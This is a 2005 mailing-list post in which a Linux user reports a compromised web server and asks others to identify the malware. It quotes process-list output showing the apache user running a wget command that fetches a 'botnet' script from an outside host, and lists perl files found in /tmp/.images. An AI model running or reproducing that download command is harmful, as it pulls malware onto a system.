[vox-tech] lugod.org cracked?
Rod Roark
rod at sunsetsystems.com
Tue Feb 15 12:22:34 PST 2005
I found that something was sucking up all my bandwidth late
this morning. ps -aux showed this:
apache 3267 0.0 0.0 2560 1024 ? S 11:14 0:00 sh -c wget leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1
apache 3268 0.0 0.1 3060 1460 ? S 11:14 0:00 wget leblocks.sytes.net/botnet
apache 3269 0.0 0.0 1416 448 ? S 11:14 0:00 grep abcdeee
After killing all processes owned by apache and doing a bit
of checking around, I found these perl scripts in
/tmp/.images:
-rw-r--r-- 1 apache apache 20281 Feb 15 12:13 botnet
-rw-r--r-- 1 apache apache 9592 Oct 12 23:23 pv
-rw-r--r-- 1 apache apache 9592 Oct 12 23:23 pv.1
They are definitely malicious. Does anyone know what this
malware is?
-- Rod
More information about the vox-tech
mailing list